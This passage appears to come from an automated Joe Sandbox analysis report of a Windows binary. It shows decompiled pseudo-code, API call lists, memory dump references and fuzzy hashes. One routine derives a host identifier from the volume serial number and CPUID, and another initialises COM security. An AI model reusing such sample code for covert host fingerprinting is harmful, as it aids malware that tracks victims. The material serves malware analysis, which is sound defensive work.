                          				void* __ebp;
                          				signed int _t62;
                          				signed int _t63;
                          				intOrPtr* _t72;
                          				signed short* _t76;
                          				signed int _t77;
                          				void* _t88;
                          				intOrPtr _t104;
                          				signed int _t110;
                          				signed short* _t112;
                          				intOrPtr* _t113;
                          				intOrPtr _t114;
                          				signed int _t116;
                          				void* _t117;
                          				signed short* _t120;
                          				void* _t121;
                          				signed int _t122;
                          				void* _t123;
                          				void* _t124;
                          
                          				_t104 = __edx;
                          				_push(0xffffffff);
                          				_push(0x136687d);
                          				_push( *[fs:0x0]);
                          				_t124 = _t123 - 0x58;
                          				_t62 =  *0x13a4018; // 0x39cca9f6
                          				_t63 = _t62 ^ _t122;
                          				_v20 = _t63;
                          				_push(__ebx);
                          				_push(_t117);
                          				_push(_t63);
                          				 *[fs:0x0] =  &_v16;
                          				_t112 = _a4;
                          				_push(0x34);
                          				_v100 = _t112;
                          				_v104 = _t112;
                          				_v56 = 0;
                          				_v52 = 7;
                          				_v72 = 0;
                          				E012F51B0(__ebx,  &_v72, _t112, _t117, L"AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz");
                          				_v8 = 0;
                          				_push(1);
                          				_v80 = 0;
                          				_v76 = 7;
                          				_v96 = 0;
                          				E012F51B0(__ebx,  &_v96, _t112, _t117, ".");
                          				_v8 = 1;
                          				_v24 = 0;
                          				GetVolumeInformationW(0, 0, 0,  &_v24, 0, 0, 0, 0); // executed
                          				_push(__ebx);
                          				asm("cpuid");
                          				asm("xorps xmm0, xmm0");
                          				asm("movups [ebp-0x24], xmm0");
                          				_pop(_t88);
                          				_t113 =  &_v40;
                          				 *_t113 = 0;
                          				_t72 = _t113;
                          				 *((intOrPtr*)(_t72 + 4)) = __ebx;
                          				 *((intOrPtr*)(_t72 + 8)) = 0;
                          				 *((intOrPtr*)(_t72 + 0xc)) = _t104;
                          				E012F8010(_t88,  &_v48, _v32 + _v28 + _v36 + _v40 + _v24, _t113);
                          				_t114 = _v100;
                          				_v8 = 2;
                          				_t110 = _v28;
                          				_t95 =  >=  ? _v48 :  &_v48;
                          				_t120 =  >=  ? _v48 :  &_v48;
                          				_t76 =  &(( >=  ? _v48 :  &_v48)[_v32]);
                          				_v104 = _t76;
                          				if(_t120 != _t76) {
                          					_t116 = _v52;
                          					asm("o16 nop [eax+eax]");
                          					do {
                          						_t84 = ( *_t120 & 0x0000ffff) - 0x30;
                          						if(( *_t120 & 0x0000ffff) - 0x30 < _v56) {
                          							_t102 =  >=  ? _v72 :  &_v72;
                          							E012FC140(_t88,  &_v96, _t116, _t120,  *(( >=  ? _v72 :  &_v72) + _t84 * 2) & 0x0000ffff);
                          						}
                          						_t120 =  &(_t120[1]);
                          					} while (_t120 != _v104);
                          					_t114 = _v100;
                          					_t110 = _v28;
                          				}
                          				 *(_t114 + 0x10) = 0;
                          				 *(_t114 + 0x14) = 0;
                          				asm("movups xmm0, [ebp-0x5c]");
                          				asm("movups [edi], xmm0");
                          				asm("movq xmm0, [ebp-0x4c]");
                          				asm("movq [edi+0x10], xmm0");
                          				if(_t110 >= 8) {
                          					_push(2 + _t110 * 2);
                          					E012F56A0(_t88, _t114, _v48);
                          					_t124 = _t124 + 8;
                          				}
                          				_t77 = _v52;
                          				if(_t77 >= 8) {
                          					_push(2 + _t77 * 2);
                          					E012F56A0(_t88, _t114, _v72);
                          				}
                          				 *[fs:0x0] = _v16;
                          				_pop(_t121);
                          				return E0132EA79(_v20 ^ _t122, _t121);
                          			}

                          APIs
                          • GetVolumeInformationW.KERNELBASE(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,013836C8,00000001,AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz,00000034,39CCA9F6), ref: 0130621E
                          Strings
                          • AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz, xrefs: 013061B8
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: InformationVolume
                          • String ID: AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz
                          • API String ID: 2039140958-2288835824
                          • Opcode ID: f4067f11e442583d6e6a94195135ced9cb2e9faae2a3dc961051b966f436ca3c
                          • Instruction ID: 83e5dab794edca1276eb31440ae358d3700422d6f0d253cb4fa23f3318dc807b
                          • Opcode Fuzzy Hash: f4067f11e442583d6e6a94195135ced9cb2e9faae2a3dc961051b966f436ca3c
                          • Instruction Fuzzy Hash: BE515871E10209DBDB10CFA8C985BEEFBB5FF58314F60811AE905BB290D774AA55CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 536 1315590-13155f8 537 1315bb3-1315be7 CoInitializeEx CoInitializeSecurity 536->537 538 13155fe-1315622 call 12f8140 call 12f93f0 536->538 543 1315624-1315659 538->543 544 131565b-1315660 call 12f54c0 538->544 545 1315665-131566f 543->545 544->545 547 1315671-1315681 call 12f56a0 545->547 548 1315684-131569b call 12f93f0 545->548 547->548 553 13156d4-13156d9 call 12f54c0 548->553 554 131569d-13156d2 548->554 555 13156de-13156e8 553->555 554->555 557 13156ea-13156fa call 12f56a0 555->557 558 13156fd-1315714 call 12f93f0 555->558 557->558 563 1315716-131574b 558->563 564 131574d-1315752 call 12f54c0 558->564 565 1315757-1315761 563->565 564->565 567 1315763-1315773 call 12f56a0 565->567 568 1315776-131578d call 12f93f0 565->568 567->568 573 13157c6-13157cb call 12f54c0 568->573 574 131578f-13157c4 568->574 575 13157d0-13157da 573->575 574->575 577 13157dc-13157ec call 12f56a0 575->577 578 13157ef-1315806 call 12f93f0 575->578 577->578 583 1315808-131583d 578->583 584 131583f-1315844 call 12f54c0 578->584 585 1315849-1315853 583->585 584->585 587 1315855-1315865 call 12f56a0 585->587 588 1315868-131587f call 12f93f0 585->588 587->588 593 1315881-13158b6 588->593 594 13158b8-13158bd call 12f54c0 588->594 595 13158c2-13158cc 593->595 594->595 597 13158e1-13158f8 call 12f93f0 595->597 598 13158ce-13158de call 12f56a0 595->598 603 1315931-1315936 call 12f54c0 597->603 604 13158fa-131592f 597->604 598->597 605 131593b-1315945 603->605 604->605 607 1315947-1315957 call 12f56a0 605->607 608 131595a-1315971 call 12f93f0 605->608 607->608 613 1315973-13159a8 608->613 614 13159aa-13159af call 12f54c0 608->614 615 13159b4-13159be 613->615 614->615 617 13159c0-13159d0 call 12f56a0 615->617 618 13159d3-13159ea call 12f93f0 615->618 617->618 623 1315a23-1315a28 call 12f54c0 618->623 624 13159ec-1315a21 618->624 625 1315a2d-1315a37 623->625 624->625 627 1315a39-1315a49 call 12f56a0 625->627 628 1315a4c-1315a63 call 12f93f0 625->628 
627->628 633 1315a65-1315a9a 628->633 634 1315a9c-1315aa1 call 12f54c0 628->634 635 1315aa6-1315ab0 633->635 634->635 637 1315ab2-1315ac2 call 12f56a0 635->637 638 1315ac5-1315adc call 12f93f0 635->638 637->638 643 1315b15-1315b1a call 12f54c0 638->643 644 1315ade-1315b13 638->644 645 1315b1f-1315b29 643->645 644->645 647 1315b2b-1315b3b call 12f56a0 645->647 648 1315b3e-1315b55 call 12f93f0 645->648 647->648 653 1315b57-1315b8c 648->653 654 1315b8e-1315b93 call 12f54c0 648->654 655 1315b98-1315b9e 653->655 654->655 655->537 657 1315ba0-1315bb0 call 12f56a0 655->657 657->537
                          C-Code - Quality: 45%
                          			E01315590(void* __ebx, intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8) {
                          				char _v8;
                          				char _v16;
                          				intOrPtr _v20;
                          				signed int _v24;
                          				char _v44;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				signed int _t207;
                          				intOrPtr _t210;
                          				short* _t213;
                          				signed int _t215;
                          				short* _t216;
                          				signed int _t218;
                          				short* _t219;
                          				signed int _t221;
                          				short* _t222;
                          				signed int _t224;
                          				short* _t225;
                          				signed int _t227;
                          				short* _t228;
                          				signed int _t230;
                          				short* _t231;
                          				signed int _t233;
                          				short* _t234;
                          				signed int _t236;
                          				short* _t237;
                          				signed int _t239;
                          				short* _t240;
                          				signed int _t242;
                          				short* _t243;
                          				signed int _t245;
                          				short* _t246;
                          				signed int _t248;
                          				intOrPtr _t279;
                          				intOrPtr _t282;
                          				intOrPtr _t285;
                          				intOrPtr _t288;
                          				intOrPtr _t291;
                          				intOrPtr _t294;
                          				intOrPtr _t297;
                          				intOrPtr _t300;
                          				intOrPtr _t303;
                          				intOrPtr _t306;
                          				intOrPtr _t309;
                          				intOrPtr _t312;
                          				intOrPtr _t339;
                          				void* _t341;
                          				signed int _t343;
                          				void* _t344;
                          				void* _t345;
                          
                          				_t273 = __ebx;
                          				_push(0xffffffff);
                          				_push(0x13683eb);
                          				_push( *[fs:0x0]);
                          				_t345 = _t344 - 0x1c;
                          				_push(_t341);
                          				_t207 =  *0x13a4018; // 0x39cca9f6
                          				_push(_t207 ^ _t343);
                          				 *[fs:0x0] =  &_v16;
                          				_t339 = __ecx;
                          				_v20 = __ecx;
                          				_t210 = _a8;
                          				 *((intOrPtr*)(__ecx)) = _t210;
                          				 *((intOrPtr*)(__ecx + 4)) = 0;
                          				 *((intOrPtr*)(__ecx + 8)) = 0;
                          				 *((intOrPtr*)(__ecx + 0xc)) = 0;
                          				_v8 = 0;
                          				 *((intOrPtr*)(__ecx + 0x10)) = 0;
                          				 *((intOrPtr*)(__ecx + 0x14)) = 0;
                          				 *((intOrPtr*)(__ecx + 0x18)) = 0;
                          				_v8 = 1;
                          				_t347 = _t210;
                          				if(_t210 > 0) {
                          					_t13 = _t339 + 0x10; // 0x10
                          					E012F8140(_t13, __ecx, 0, _a4);
                          					_t213 = E012F93F0( &_v44, 0x13a756c, __ecx, _t347);
                          					_v8 = 2;
                          					_t279 =  *((intOrPtr*)(__ecx + 0x14));
                          					if(_t279 ==  *((intOrPtr*)(__ecx + 0x18))) {
                          						_push(_t213);
                          						_t24 = _t339 + 0x10; // 0x10
                          						E012F54C0(__ebx, _t24, __ecx, _t341, _t279);
                          					} else {
                          						 *((intOrPtr*)(_t279 + 0x10)) = 0;
                          						 *((intOrPtr*)(_t279 + 0x14)) = 0;
                          						asm("movups xmm0, [eax]");
                          						asm("movups [ecx], xmm0");
                          						asm("movq xmm0, [eax+0x10]");
                          						asm("movq [ecx+0x10], xmm0");
                          						 *((intOrPtr*)(_t213 + 0x10)) = 0;
                          						 *((intOrPtr*)(_t213 + 0x14)) = 7;
                          						 *_t213 = 0;
                          						 *((intOrPtr*)(__ecx + 0x14)) =  *((intOrPtr*)(__ecx + 0x14)) + 0x18;
                          					}
                          					_v8 = 1;
                          					_t215 = _v24;
                          					_t349 = _t215 - 8;
                          					if(_t215 >= 8) {
                          						_push(2 + _t215 * 2);
                          						E012F56A0(_t273, _t339, _v44);
                          						_t345 = _t345 + 8;
                          					}
                          					_t216 = E012F93F0( &_v44, 0x13a753c, _t339, _t349);
                          					_v8 = 3;
                          					_t282 =  *((intOrPtr*)(_t339 + 0x14));
                          					if(_t282 ==  *((intOrPtr*)(_t339 + 0x18))) {
                          						_push(_t216);
                          						_t40 = _t339 + 0x10; // 0x10
                          						E012F54C0(_t273, _t40, _t339, _t341, _t282);
                          					} else {
                          						 *((intOrPtr*)(_t282 + 0x10)) = 0;
                          						 *((intOrPtr*)(_t282 + 0x14)) = 0;
                          						asm("movups xmm0, [eax]");
                          						asm("movups [ecx], xmm0");
                          						asm("movq xmm0, [eax+0x10]");
                          						asm("movq [ecx+0x10], xmm0");
                          						 *((intOrPtr*)(_t216 + 0x10)) = 0;
                          						 *((intOrPtr*)(_t216 + 0x14)) = 7;
                          						 *_t216 = 0;
                          						 *((intOrPtr*)(_t339 + 0x14)) =  *((intOrPtr*)(_t339 + 0x14)) + 0x18;
                          					}
                          					_v8 = 1;
                          					_t218 = _v24;
                          					_t351 = _t218 - 8;
                          					if(_t218 >= 8) {
                          						_push(2 + _t218 * 2);
                          						E012F56A0(_t273, _t339, _v44);
                          						_t345 = _t345 + 8;
                          					}
                          					_t219 = E012F93F0( &_v44, 0x13a7404, _t339, _t351);
                          					_v8 = 4;
                          					_t285 =  *((intOrPtr*)(_t339 + 0x14));
                          					if(_t285 ==  *((intOrPtr*)(_t339 + 0x18))) {
                          						_push(_t219);
                          						_t56 = _t339 + 0x10; // 0x10
                          						E012F54C0(_t273, _t56, _t339, _t341, _t285);
                          					} else {
                          						 *((intOrPtr*)(_t285 + 0x10)) = 0;
                          						 *((intOrPtr*)(_t285 + 0x14)) = 0;
                          						asm("movups xmm0, [eax]");
                          						asm("movups [ecx], xmm0");
                          						asm("movq xmm0, [eax+0x10]");
                          						asm("movq [ecx+0x10], xmm0");
                          						 *((intOrPtr*)(_t219 + 0x10)) = 0;
                          						 *((intOrPtr*)(_t219 + 0x14)) = 7;
                          						 *_t219 = 0;
                          						 *((intOrPtr*)(_t339 + 0x14)) =  *((intOrPtr*)(_t339 + 0x14)) + 0x18;
                          					}
                          					_v8 = 1;
                          					_t221 = _v24;
                          					_t353 = _t221 - 8;
                          					if(_t221 >= 8) {
                          						_push(2 + _t221 * 2);
                          						E012F56A0(_t273, _t339, _v44);
                          						_t345 = _t345 + 8;
                          					}
                          					_t222 = E012F93F0( &_v44, 0x13a735c, _t339, _t353);
                          					_v8 = 5;
                          					_t288 =  *((intOrPtr*)(_t339 + 0x14));
                          					if(_t288 ==  *((intOrPtr*)(_t339 + 0x18))) {
                          						_push(_t222);
                          						_t72 = _t339 + 0x10; // 0x10
                          						E012F54C0(_t273, _t72, _t339, _t341, _t288);
                          					} else {
                          						 *((intOrPtr*)(_t288 + 0x10)) = 0;
                          						 *((intOrPtr*)(_t288 + 0x14)) = 0;
                          						asm("movups xmm0, [eax]");
                          						asm("movups [ecx], xmm0");
                          						asm("movq xmm0, [eax+0x10]");
                          						asm("movq [ecx+0x10], xmm0");
                          						 *((intOrPtr*)(_t222 + 0x10)) = 0;
                          						 *((intOrPtr*)(_t222 + 0x14)) = 7;
                          						 *_t222 = 0;
                          						 *((intOrPtr*)(_t339 + 0x14)) =  *((intOrPtr*)(_t339 + 0x14)) + 0x18;
                          					}
                          					_v8 = 1;
                          					_t224 = _v24;
                          					_t355 = _t224 - 8;
                          					if(_t224 >= 8) {
                          						_push(2 + _t224 * 2);
                          						E012F56A0(_t273, _t339, _v44);
                          						_t345 = _t345 + 8;
                          					}
                          					_t225 = E012F93F0( &_v44, 0x13a747c, _t339, _t355);
                          					_v8 = 6;
                          					_t291 =  *((intOrPtr*)(_t339 + 0x14));
                          					if(_t291 ==  *((intOrPtr*)(_t339 + 0x18))) {
                          						_push(_t225);
                          						_t88 = _t339 + 0x10; // 0x10
                          						E012F54C0(_t273, _t88, _t339, _t341, _t291);
                          					} else {
                          						 *((intOrPtr*)(_t291 + 0x10)) = 0;
                          						 *((intOrPtr*)(_t291 + 0x14)) = 0;
                          						asm("movups xmm0, [eax]");
                          						asm("movups [ecx], xmm0");
                          						asm("movq xmm0, [eax+0x10]");
                          						asm("movq [ecx+0x10], xmm0");
                          						 *((intOrPtr*)(_t225 + 0x10)) = 0;
                          						 *((intOrPtr*)(_t225 + 0x14)) = 7;
                          						 *_t225 = 0;
                          						 *((intOrPtr*)(_t339 + 0x14)) =  *((intOrPtr*)(_t339 + 0x14)) + 0x18;
                          					}
                          					_v8 = 1;
                          					_t227 = _v24;
                          					_t357 = _t227 - 8;
                          					if(_t227 >= 8) {
                          						_push(2 + _t227 * 2);
                          						E012F56A0(_t273, _t339, _v44);
                          						_t345 = _t345 + 8;
                          					}
                          					_t228 = E012F93F0( &_v44, 0x13a6f6c, _t339, _t357);
                          					_v8 = 7;
                          					_t294 =  *((intOrPtr*)(_t339 + 0x14));
                          					if(_t294 ==  *((intOrPtr*)(_t339 + 0x18))) {
                          						_push(_t228);
                          						_t104 = _t339 + 0x10; // 0x10
                          						E012F54C0(_t273, _t104, _t339, _t341, _t294);
                          					} else {
                          						 *((intOrPtr*)(_t294 + 0x10)) = 0;
                          						 *((intOrPtr*)(_t294 + 0x14)) = 0;
                          						asm("movups xmm0, [eax]");
                          						asm("movups [ecx], xmm0");
                          						asm("movq xmm0, [eax+0x10]");
                          						asm("movq [ecx+0x10], xmm0");
                          						 *((intOrPtr*)(_t228 + 0x10)) = 0;
                          						 *((intOrPtr*)(_t228 + 0x14)) = 7;
                          						 *_t228 = 0;
                          						 *((intOrPtr*)(_t339 + 0x14)) =  *((intOrPtr*)(_t339 + 0x14)) + 0x18;
                          					}
                          					_v8 = 1;
                          					_t230 = _v24;
                          					_t359 = _t230 - 8;
                          					if(_t230 >= 8) {
                          						_push(2 + _t230 * 2);
                          						E012F56A0(_t273, _t339, _v44);
                          						_t345 = _t345 + 8;
                          					}
                          					_t231 = E012F93F0( &_v44, 0x13a72fc, _t339, _t359);
                          					_v8 = 8;
                          					_t297 =  *((intOrPtr*)(_t339 + 0x14));
                          					if(_t297 ==  *((intOrPtr*)(_t339 + 0x18))) {
                          						_push(_t231);
                          						_t120 = _t339 + 0x10; // 0x10
                          						E012F54C0(_t273, _t120, _t339, _t341, _t297);
                          					} else {
                          						 *((intOrPtr*)(_t297 + 0x10)) = 0;
                          						 *((intOrPtr*)(_t297 + 0x14)) = 0;
                          						asm("movups xmm0, [eax]");
                          						asm("movups [ecx], xmm0");
                          						asm("movq xmm0, [eax+0x10]");
                          						asm("movq [ecx+0x10], xmm0");
                          						 *((intOrPtr*)(_t231 + 0x10)) = 0;
                          						 *((intOrPtr*)(_t231 + 0x14)) = 7;
                          						 *_t231 = 0;
                          						 *((intOrPtr*)(_t339 + 0x14)) =  *((intOrPtr*)(_t339 + 0x14)) + 0x18;
                          					}
                          					_v8 = 1;
                          					_t233 = _v24;
                          					_t361 = _t233 - 8;
                          					if(_t233 >= 8) {
                          						_push(2 + _t233 * 2);
                          						E012F56A0(_t273, _t339, _v44);
                          						_t345 = _t345 + 8;
                          					}
                          					_t234 = E012F93F0( &_v44, 0x13a73d4, _t339, _t361);
                          					_v8 = 9;
                          					_t300 =  *((intOrPtr*)(_t339 + 0x14));
                          					if(_t300 ==  *((intOrPtr*)(_t339 + 0x18))) {
                          						_push(_t234);
                          						_t136 = _t339 + 0x10; // 0x10
                          						E012F54C0(_t273, _t136, _t339, _t341, _t300);
                          					} else {
                          						 *((intOrPtr*)(_t300 + 0x10)) = 0;
                          						 *((intOrPtr*)(_t300 + 0x14)) = 0;
                          						asm("movups xmm0, [eax]");
                          						asm("movups [ecx], xmm0");
                          						asm("movq xmm0, [eax+0x10]");
                          						asm("movq [ecx+0x10], xmm0");
                          						 *((intOrPtr*)(_t234 + 0x10)) = 0;
                          						 *((intOrPtr*)(_t234 + 0x14)) = 7;
                          						 *_t234 = 0;
                          						 *((intOrPtr*)(_t339 + 0x14)) =  *((intOrPtr*)(_t339 + 0x14)) + 0x18;
                          					}
                          					_v8 = 1;
                          					_t236 = _v24;
                          					_t363 = _t236 - 8;
                          					if(_t236 >= 8) {
                          						_push(2 + _t236 * 2);
                          						E012F56A0(_t273, _t339, _v44);
                          						_t345 = _t345 + 8;
                          					}
                          					_t237 = E012F93F0( &_v44, 0x13a723c, _t339, _t363);
                          					_v8 = 0xa;
                          					_t303 =  *((intOrPtr*)(_t339 + 0x14));
                          					if(_t303 ==  *((intOrPtr*)(_t339 + 0x18))) {
                          						_push(_t237);
                          						_t152 = _t339 + 0x10; // 0x10
                          						E012F54C0(_t273, _t152, _t339, _t341, _t303);
                          					} else {
                          						 *((intOrPtr*)(_t303 + 0x10)) = 0;
                          						 *((intOrPtr*)(_t303 + 0x14)) = 0;
                          						asm("movups xmm0, [eax]");
                          						asm("movups [ecx], xmm0");
                          						asm("movq xmm0, [eax+0x10]");
                          						asm("movq [ecx+0x10], xmm0");
                          						 *((intOrPtr*)(_t237 + 0x10)) = 0;
                          						 *((intOrPtr*)(_t237 + 0x14)) = 7;
                          						 *_t237 = 0;
                          						 *((intOrPtr*)(_t339 + 0x14)) =  *((intOrPtr*)(_t339 + 0x14)) + 0x18;
                          					}
                          					_v8 = 1;
                          					_t239 = _v24;
                          					_t365 = _t239 - 8;
                          					if(_t239 >= 8) {
                          						_push(2 + _t239 * 2);
                          						E012F56A0(_t273, _t339, _v44);
                          						_t345 = _t345 + 8;
                          					}
                          					_t240 = E012F93F0( &_v44, 0x13a723c, _t339, _t365);
                          					_v8 = 0xb;
                          					_t306 =  *((intOrPtr*)(_t339 + 0x14));
                          					if(_t306 ==  *((intOrPtr*)(_t339 + 0x18))) {
                          						_push(_t240);
                          						_t168 = _t339 + 0x10; // 0x10
                          						E012F54C0(_t273, _t168, _t339, _t341, _t306);
                          					} else {
                          						 *((intOrPtr*)(_t306 + 0x10)) = 0;
                          						 *((intOrPtr*)(_t306 + 0x14)) = 0;
                          						asm("movups xmm0, [eax]");
                          						asm("movups [ecx], xmm0");
                          						asm("movq xmm0, [eax+0x10]");
                          						asm("movq [ecx+0x10], xmm0");
                          						 *((intOrPtr*)(_t240 + 0x10)) = 0;
                          						 *((intOrPtr*)(_t240 + 0x14)) = 7;
                          						 *_t240 = 0;
                          						 *((intOrPtr*)(_t339 + 0x14)) =  *((intOrPtr*)(_t339 + 0x14)) + 0x18;
                          					}
                          					_v8 = 1;
                          					_t242 = _v24;
                          					_t367 = _t242 - 8;
                          					if(_t242 >= 8) {
                          						_push(2 + _t242 * 2);
                          						E012F56A0(_t273, _t339, _v44);
                          						_t345 = _t345 + 8;
                          					}
                          					_t243 = E012F93F0( &_v44, 0x13a70d4, _t339, _t367);
                          					_v8 = 0xc;
                          					_t309 =  *((intOrPtr*)(_t339 + 0x14));
                          					if(_t309 ==  *((intOrPtr*)(_t339 + 0x18))) {
                          						_push(_t243);
                          						_t184 = _t339 + 0x10; // 0x10
                          						E012F54C0(_t273, _t184, _t339, _t341, _t309);
                          					} else {
                          						 *((intOrPtr*)(_t309 + 0x10)) = 0;
                          						 *((intOrPtr*)(_t309 + 0x14)) = 0;
                          						asm("movups xmm0, [eax]");
                          						asm("movups [ecx], xmm0");
                          						asm("movq xmm0, [eax+0x10]");
                          						asm("movq [ecx+0x10], xmm0");
                          						 *((intOrPtr*)(_t243 + 0x10)) = 0;
                          						 *((intOrPtr*)(_t243 + 0x14)) = 7;
                          						 *_t243 = 0;
                          						 *((intOrPtr*)(_t339 + 0x14)) =  *((intOrPtr*)(_t339 + 0x14)) + 0x18;
                          					}
                          					_v8 = 1;
                          					_t245 = _v24;
                          					_t369 = _t245 - 8;
                          					if(_t245 >= 8) {
                          						_push(2 + _t245 * 2);
                          						E012F56A0(_t273, _t339, _v44);
                          						_t345 = _t345 + 8;
                          					}
                          					_t246 = E012F93F0( &_v44, 0x13a7524, _t339, _t369);
                          					_v8 = 0xd;
                          					_t312 =  *((intOrPtr*)(_t339 + 0x14));
                          					if(_t312 ==  *((intOrPtr*)(_t339 + 0x18))) {
                          						_push(_t246);
                          						_t200 = _t339 + 0x10; // 0x10
                          						E012F54C0(_t273, _t200, _t339, _t341, _t312);
                          					} else {
                          						 *((intOrPtr*)(_t312 + 0x10)) = 0;
                          						 *((intOrPtr*)(_t312 + 0x14)) = 0;
                          						asm("movups xmm0, [eax]");
                          						asm("movups [ecx], xmm0");
                          						asm("movq xmm0, [eax+0x10]");
                          						asm("movq [ecx+0x10], xmm0");
                          						 *((intOrPtr*)(_t246 + 0x10)) = 0;
                          						 *((intOrPtr*)(_t246 + 0x14)) = 7;
                          						 *_t246 = 0;
                          						 *((intOrPtr*)(_t339 + 0x14)) =  *((intOrPtr*)(_t339 + 0x14)) + 0x18;
                          					}
                          					_t248 = _v24;
                          					if(_t248 >= 8) {
                          						_push(2 + _t248 * 2);
                          						E012F56A0(_t273, _t339, _v44);
                          					}
                          				}
                          				__imp__CoInitializeEx(0, 0); // executed
                          				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0); // executed
                          				 *[fs:0x0] = _v16;
                          				return _t339;
                          			}

                          APIs
                          • CoInitializeEx.OLE32(00000000,00000000,39CCA9F6,?,00000000,00000000,013683EB,000000FF,?,01314792,00000000), ref: 01315BB7
                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,01314792,00000000), ref: 01315BCF
                            • Part of subcall function 012F54C0: Concurrency::cancel_current_task.LIBCPMT ref: 012F562A
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: Initialize$Concurrency::cancel_current_taskSecurity
                          • String ID:
                          • API String ID: 1505598098-0
                          • Opcode ID: d6f290eb755cb1982142301403040056092c4a2872bc07fa544603cae4568c6e
                          • Instruction ID: 6380c09fe1e62c5e56717035aeaa3e4b73da38d41cf841bb77cf4def56e2a33c
                          • Opcode Fuzzy Hash: d6f290eb755cb1982142301403040056092c4a2872bc07fa544603cae4568c6e
                          • Instruction Fuzzy Hash: F8128C70810745DFE709CF28D954BAABB70FF51308F50069CD4052B5A2D776EA95CBE1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 61%
                          			E0130ACE0(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, char _a4, intOrPtr _a8) {
                          				char _v8;
                          				char _v16;
                          				signed int _v20;
                          				intOrPtr _v24;
                          				intOrPtr _v28;
                          				char _v32;
                          				intOrPtr _v36;
                          				intOrPtr _v40;
                          				intOrPtr _v44;
                          				char _v48;
                          				intOrPtr _v52;
                          				intOrPtr _v56;
                          				char _v60;
                          				intOrPtr _v64;
                          				intOrPtr _v68;
                          				intOrPtr _v72;
                          				char _v76;
                          				signed int _v80;
                          				intOrPtr _v84;
                          				void _v100;
                          				intOrPtr _v104;
                          				intOrPtr _v108;
                          				intOrPtr _v112;
                          				char _v116;
                          				signed int _v120;
                          				intOrPtr _v124;
                          				short _v140;
                          				signed int _v144;
                          				intOrPtr _v148;
                          				short _v164;
                          				signed int _v168;
                          				intOrPtr _v172;
                          				short _v188;
                          				char _v192;
                          				signed int _v196;
                          				intOrPtr _v200;
                          				short _v216;
                          				signed int _v220;
                          				char _v240;
                          				intOrPtr* _v244;
                          				intOrPtr* _v248;
                          				signed int _v252;
                          				intOrPtr _v256;
                          				short _v272;
                          				void* __esi;
                          				void* __ebp;
                          				signed int _t806;
                          				signed int _t807;
                          				void* _t815;
                          				void* _t816;
                          				void* _t817;
                          				short* _t818;
                          				signed int _t820;
                          				signed int _t822;
                          				signed int _t824;
                          				signed int _t826;
                          				signed int _t828;
                          				void* _t830;
                          				void* _t831;
                          				short* _t832;
                          				signed int _t834;
                          				signed int _t836;
                          				signed int _t838;
                          				signed int _t840;
                          				void* _t842;
                          				void* _t843;
                          				short* _t844;
                          				signed int _t846;
                          				signed int _t848;
                          				signed int _t850;
                          				signed int _t852;
                          				void* _t853;
                          				short* _t854;
                          				signed int _t856;
                          				signed int _t858;
                          				void* _t859;
                          				short* _t860;
                          				signed int _t862;
                          				signed int _t864;
                          				void* _t865;
                          				short* _t866;
                          				signed int _t868;
                          				signed int _t870;
                          				void* _t872;
                          				void* _t873;
                          				short* _t874;
                          				signed int _t876;
                          				signed int _t878;
                          				signed int _t880;
                          				signed int _t882;
                          				void* _t883;
                          				short* _t884;
                          				signed int _t886;
                          				signed int _t888;
                          				void* _t889;
                          				short* _t890;
                          				signed int _t892;
                          				signed int _t894;
                          				short* _t895;
                          				signed int _t897;
                          				short* _t898;
                          				signed int _t900;
                          				short* _t901;
                          				signed int _t903;
                          				short* _t904;
                          				signed int _t906;
                          				short* _t907;
                          				signed int _t909;
                          				short* _t910;
                          				signed int _t912;
                          				void* _t914;
                          				void* _t915;
                          				void* _t916;
                          				void* _t917;
                          				short* _t918;
                          				signed int _t920;
                          				signed int _t922;
                          				signed int _t924;
                          				signed int _t926;
                          				signed int _t928;
                          				signed int _t930;
                          				void* _t932;
                          				void* _t933;
                          				short* _t934;
                          				char _t935;
                          				signed int _t937;
                          				signed int _t939;
                          				signed int _t941;
                          				signed int _t943;
                          				void* _t945;
                          				void* _t946;
                          				short* _t947;
                          				char _t948;
                          				signed int _t950;
                          				signed int _t952;
                          				signed int _t954;
